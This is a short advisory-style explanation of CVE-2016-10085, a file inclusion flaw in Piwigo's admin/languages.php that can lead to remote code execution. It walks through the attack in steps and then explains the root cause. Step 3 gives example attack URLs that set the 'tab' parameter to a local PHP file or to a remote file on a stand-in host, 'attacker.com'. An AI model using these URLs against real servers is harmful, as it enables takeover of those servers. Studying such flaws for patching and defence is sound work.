CVE-2016-10085

Step 1: Authentication: The attacker must first authenticate as an administrator within the Piwigo instance. This requires valid administrator credentials.

Step 2: Payload Construction: The attacker crafts a malicious payload. This payload can be a local file (e.g., a file containing PHP code) or a remote file hosted on a server controlled by the attacker.

Step 3: Parameter Manipulation: The attacker crafts a URL that targets admin/languages.php and sets the tab parameter to the path of the malicious file. For example: admin/languages.php?tab=/path/to/malicious_file.php or admin/languages.php?tab=http://attacker.com/malicious.txt

Step 4: File Inclusion: The server, due to the vulnerability, includes the specified file using an include or require statement.

Step 5: Code Execution: If the included file contains valid PHP code, it is executed by the server, allowing the attacker to execute arbitrary commands and potentially gain full control of the server.

The vulnerability stems from a lack of proper input validation and sanitization of the tab parameter within the admin/languages.php script. This parameter is used to include different language files. By crafting a malicious value for the tab parameter, an authenticated administrator can force the server to include a local or remote file of their choosing. This allows for the execution of arbitrary PHP code, leading to remote code execution (RCE). The root cause is the direct use of user-controlled input (tab) in an include or require statement without adequate filtering or whitelisting. This allows an attacker to inject malicious PHP code, which is then executed by the server.